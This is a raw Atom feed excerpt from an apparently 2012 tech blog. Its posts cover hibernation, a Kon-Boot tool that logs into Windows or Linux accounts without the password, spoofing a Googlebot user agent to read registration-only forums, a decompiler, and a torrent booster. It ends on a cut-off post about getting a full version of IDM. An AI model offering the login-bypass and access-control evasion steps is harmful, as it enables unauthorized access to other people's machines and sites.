tab is unavailable, your computer does not support this mode. Hibernation
works by saving the information currently stored in your computer’s memory to
hard disk. To do this, Windows creates a hibernation file on the root of your
system partition.
This file changes size, depending on the amount of memory you have, but
always consumes the amount of space it will need—even if you have never
hibernated. Unless
you plan to use hibernation, you should disable this option to save disk&lt;span style=&quot;line-height: 115%;&quot;&gt; space.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;color: #444444; font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;
Thank you for reading. Please do leave a comment &amp;nbsp;and your suggestions are always welcome. &lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/3672981831132033947/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/what-is-hibernate-mode-and-its.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/3672981831132033947'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/3672981831132033947'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/what-is-hibernate-mode-and-its.html' title='What is Hibernate Mode and its advantage over StandBy Mode..'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-109443129819756207</id><published>2012-05-02T11:27:00.004-07:00</published><updated>2013-09-04T09:49:44.480-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computerz"/><title type='text'>Kon-Boot : Access any PC without Knowing Password</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
There are times when you may need to access a computer but you don’t 
know the password – this can include running an old machine you haven’t 
used it for&amp;nbsp; years, using one purchased at a flea market or online 
auction, or even the need to quickly access your child’s computer for 
something. What ever the reason, accessing a computer without knowing 
the password is fairly simple with this free tool called &lt;strong&gt;Kon-Boot&lt;/strong&gt; .&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Of course there are alternatives like &lt;a href=&quot;http://ophcrack.sourceforge.net/&quot;&gt;Ophcrack&lt;/a&gt;,However
 particularly I think Kon-Boot is the best tool, Which doesn’t ask any 
questions while gaining access to any PC without knowing its’ password.&lt;br /&gt;
&lt;strong&gt;Kon- boot&lt;/strong&gt;
 is a software that will allow us to access any computer without knowing
 the password, and without modifying any files on Hard disk. All we have
 to do is to (just ) insert a boot (cd or floppy) disk Burned with 
Kon-boot software(110kb) in to any PC , and this offers unlimited access
 to that machine.&lt;br /&gt;
&lt;span id=&quot;more-983&quot;&gt;&lt;/span&gt;&lt;br /&gt;
[ad#ads-inner]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt; &lt;strong&gt;Kon-boot &lt;/strong&gt;which
 was initially started as a small project for Linux (mainly 
Ubuntu),where it allows to log into a Linux system as ‘root’ user 
without typing the correct password or to elevate privileges from 
current user to root. Now it was moved to windows platform where it 
enables Windows users to login to any password protected machine profile
 without any knowledge of the password.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This program works with the following versions of &lt;strong&gt;Windows: XP (SP1, SP2, SP3), Vista (Business, Ultimate), 2000, Server 2003 and 2008, and Windows 7&lt;/strong&gt;. Kon-Boot also allows you to boot Linux (distributions: Ubuntu, Gentoo, Debian and Fedora) without a password as well.&lt;br /&gt;
Windows users doesn’t require any special instructions for using&lt;strong&gt; kon-boot &lt;/strong&gt;,
 just boot the PC with Kon-Boot CD/Floppy, select your profile and put 
any password ,that’s all.The funny thing is Zipped version of Kon-boot 
for CD i.e ISO image is 8.5kb (110 kb after extracting ),where as Zipped
 version for floppy is 10kb which will goes to 1.4mb after unzipping it.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Download &lt;/strong&gt;; &lt;a href=&quot;http://www.piotrbania.com/all/kon-boot/&quot;&gt;Kon-boot&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
NOTE: Guys this Post is Copied (http://www.techno360.in/) &lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/109443129819756207/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/kon-boot-access-any-pc-without-knowing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/109443129819756207'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/109443129819756207'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/kon-boot-access-any-pc-without-knowing.html' title='Kon-Boot : Access any PC without Knowing Password'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-2009029669698593159</id><published>2012-04-28T11:59:00.000-07:00</published><updated>2013-09-04T05:40:31.900-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="General"/><title type='text'>Access any website without registering</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
Hey guys this is the warwolf and in this tutorial I will be telling you 
how to access website or forums with requires registration before 
viewing the topics. Just follow the simple steps described below.&lt;br /&gt;
&lt;br /&gt;
1. Download a Firefox add on named &amp;nbsp;User Agent Switcher&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2. Now go to Tools &amp;gt; Default User Agent &amp;nbsp;&amp;gt; User Agent Switcher &amp;gt; Options. You will find a window shown below.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtvRTQ7t3LrBqdYep8OprpUoZ76EqO7CUrNdE0G0yJW4XKfz6afpNH7sDQEAQvmZG_6Nbqpf6BMWdehHsfmW-r3FJGQdsPK4sDEmWI1qLr_WdkA3m2RgaH_njqCAMdICV789mYN46cCa4/s1600/1.PNG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;373&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtvRTQ7t3LrBqdYep8OprpUoZ76EqO7CUrNdE0G0yJW4XKfz6afpNH7sDQEAQvmZG_6Nbqpf6BMWdehHsfmW-r3FJGQdsPK4sDEmWI1qLr_WdkA3m2RgaH_njqCAMdICV789mYN46cCa4/s400/1.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

3. After opening the it, click on New. After clicking on New button you 
will get another window like this, Shown in the image below.&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh74_gPvpcttWlAo4U-dq2RvIgy0DmKpwYW5YgaP0Ro-nhwIkActUi7IKP4AjXGZIdmLMFPLUUGRwBtS2so0aXYMeUx1VdM80NNYAtKI0OkSW_sifKhqkHezhYHN7WGq5bujqiImD_Xho0/s1600/2.PNG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;362&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh74_gPvpcttWlAo4U-dq2RvIgy0DmKpwYW5YgaP0Ro-nhwIkActUi7IKP4AjXGZIdmLMFPLUUGRwBtS2so0aXYMeUx1VdM80NNYAtKI0OkSW_sifKhqkHezhYHN7WGq5bujqiImD_Xho0/s400/2.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both; text-align: center;&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

4. Now in the description feild add :&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

crawl-66-249-66-1.googlebot.com&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

And in User Agent feild type :&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

Googlebot/2.1 (+http://www.googlebot.com/bot.html)&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

Now click on OK and again OK. User Agent Switcher window will be closed now&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

5. Now again go to Tools &amp;gt; Default User Agent, and select crawl-66-249-66-1.googlebot.com as your Default User Agent.&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;&quot; style=&quot;clear: both;&quot;&gt;

6. Now you Done ! Just open your favroite forum and start browsing without registering&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/2009029669698593159/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/04/access-any-website-without-registering.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/2009029669698593159'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/2009029669698593159'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/04/access-any-website-without-registering.html' title='Access any website without registering'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtvRTQ7t3LrBqdYep8OprpUoZ76EqO7CUrNdE0G0yJW4XKfz6afpNH7sDQEAQvmZG_6Nbqpf6BMWdehHsfmW-r3FJGQdsPK4sDEmWI1qLr_WdkA3m2RgaH_njqCAMdICV789mYN46cCa4/s72-c/1.PNG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-2052805860110126132</id><published>2012-04-27T13:32:00.001-07:00</published><updated>2013-09-04T05:40:31.903-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="General"/><title type='text'>Rec Studio 4 – Reverse Engineering Compiler &amp; Decompile</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;color: black;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;color: black;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: transparent; border-width: 0px; color: black; margin: 18px 0px; outline-width: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;

&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;REC
 Studio is an interactive decompiler. It reads a Windows, Linux, Mac OS X
 or raw executable file, and attempts to produce a C-like representation
 of the code and data used to build the executable file. It has been 
designed to read files produced for many different targets, and it has 
been compiled on several host systems.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: transparent; border-width: 0px; color: black; margin: 18px 0px; outline-width: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;

&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;REC
 Studio 4 is a complete rewrite of the original REC decompiler. It uses 
more powerful analysis techniques such as partial Single Static 
Assignment (SSA), allows loading Mac OS X files and supports 32 and 64 
bit binaries.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: transparent; border-width: 0px; color: black; margin: 18px 0px; outline-width: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;

&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Although still under development, it has reached a stage that makes it more useful than the old Rec Studio 2.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: transparent; border-width: 0px; color: black; margin: 18px 0px; outline-width: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;

&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;Features&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: transparent; border-width: 0px; color: black; margin: 18px 0px; outline-width: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;

&lt;/div&gt;
&lt;ul style=&quot;background-color: transparent; border-width: 0px; color: black; list-style-type: none; margin: 0px 0px 20px; outline-width: 0px; padding: 0px 0px 0px 30px; vertical-align: baseline;&quot;&gt;
&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; list-style-type: circle; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Multihost: Rec Studio runs on Windows XP/Vista/7, Ubuntu Linux, Mac OS X.&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; list-style-type: circle; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Symbolic information support using Dwarf 2 and partial recognition of Microsoft’s PDB format.&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; list-style-type: circle; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;C++
 is partially recognized: mangled names generated by gcc are demangled, 
as well as inheritance described in dwarf2 is honored. However, C++ is a
 very broad and difficult language, so some features 
like&amp;nbsp;&amp;nbsp;templates&amp;nbsp;won’t likely be ever supported.&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; list-style-type: circle; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Types
 and function prototype definitions can be specified in text files. Some
 standard Posix and Windows APIs are already provided in the Rec Studio 
package.&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; list-style-type: circle; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Interactivity
 is supported, limited to definition of sections, labels and function 
entry points. Will need to improve it to support in-program definition 
of types and function parameters.&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: transparent; border-width: 0px; color: black; margin: 18px 0px; outline-width: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;

&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Although
 REC can read Win32 executable (aka PE) files produced by Visual C++ or 
Visual Basic 5, there are limitations on the output produced. REC will 
try to use whatever information is present in the .EXE symbol table. If 
the .EXE file was compiled without debugging information, if a program 
data base file (.PDB) or Codeview (C7) format was used, or if the 
optimization option of the compiler was enabled, the output produced 
will not be very good. Moreover, Visual Basic 5 executable files are a 
mix of Subroutine code and Form data. It is almost impossible for REC to
 determine which is which. The only option is to use a .cmd file and 
manually specify which area is code and which area is data.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: transparent; border-width: 0px; color: black; margin: 18px 0px; outline-width: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;

&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;You can download Rec Studio 4 here:&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;b style=&quot;color: black;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 21px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;Windows –&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.backerstreet.com/rec/RecStudioWin.zip&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;RecStudioWin.zip&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 21px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;Ubuntu –&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.backerstreet.com/rec/RecStudioLinux.tgz&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;RecStudioLinux.tgz&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 21px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 18px; margin-left: 0px; margin-right: 0px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;

&lt;span class=&quot;Apple-style-span&quot;&gt;Mac –&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.backerstreet.com/rec/RecStudioMac.tgz&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;RecStudioMac.tgz&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: transparent; border-width: 0px; margin: 18px 0px; outline-width: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: transparent; border-width: 0px; margin: 18px 0px; outline-width: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: transparent; border-width: 0px; margin: 18px 0px; outline-width: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: transparent; border-width: 0px; margin: 18px 0px; outline-width: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: transparent; border-width: 0px; margin: 18px 0px; outline-width: 0px; padding: 0px; text-align: justify; vertical-align: baseline;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot;&gt;NOTE: This Post iz Copied.&amp;nbsp; (http://www.hackersgroupofindia.in/) &lt;/span&gt;&lt;/div&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/2052805860110126132/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/04/rec-studio-4-reverse-engineering.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/2052805860110126132'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/2052805860110126132'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/04/rec-studio-4-reverse-engineering.html' title='Rec Studio 4 – Reverse Engineering Compiler &amp; Decompile'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-8164033504725376845</id><published>2012-04-25T14:48:00.000-07:00</published><updated>2013-09-04T05:40:31.906-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="General"/><title type='text'>Boost Torrent Speeds using UTorrent Turbo Booster</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
UTorrent Turbo Booster is a kind of plugin for the most popular p2p 
client called UTorrent which will improve speeds and functionality of 
your torrent application. Now this tool is designed for getting your 
speeds higher and making your downloads fast and much more stable by 
increasing seeds which are almost lost during the transaction. So now 
using this software you will be able to download your movies, songs and 
games at much higher speeds.&lt;br /&gt;
&lt;br /&gt;
 &lt;img alt=&quot;utorrent-turbo-booster&quot; border=&quot;0&quot; height=&quot;338&quot; src=&quot;http://lh5.ggpht.com/-IUdamfbcOLg/T4X0vck2O6I/AAAAAAAADdQ/2ntkNYYIs8o/3610290_2%25255B3%25255D.jpg?imgmax=800&quot; style=&quot;background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: block; float: none; margin: 5px auto; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; title=&quot;&quot; width=&quot;586&quot; /&gt;&lt;br /&gt;
 &lt;h3&gt;
&amp;nbsp;&lt;/h3&gt;
&lt;h3&gt;
Download UTorrent Turbo Booster :&lt;/h3&gt;
Well if you are really keen of getting this freeware utility for boosting your UTorrent downloads than you can &lt;a href=&quot;http://utorrent-turbo-booster.software.informer.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;download it&lt;/a&gt;
 from software informer website for free. You can also more in details 
about this software right on their website. So now have fun boosting 
your speeds and downloading awesome stuff.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/8164033504725376845/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/04/boost-torrent-speeds-using-utorrent.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/8164033504725376845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/8164033504725376845'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/04/boost-torrent-speeds-using-utorrent.html' title='Boost Torrent Speeds using UTorrent Turbo Booster'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://lh5.ggpht.com/-IUdamfbcOLg/T4X0vck2O6I/AAAAAAAADdQ/2ntkNYYIs8o/s72-c/3610290_2%25255B3%25255D.jpg?imgmax=800" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-8005463281624176362</id><published>2012-04-25T14:23:00.003-07:00</published><updated>2013-09-10T02:54:38.260-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="General"/><title type='text'>How to Make IDM Full Version without Patching</title><content type='html'>&lt;div 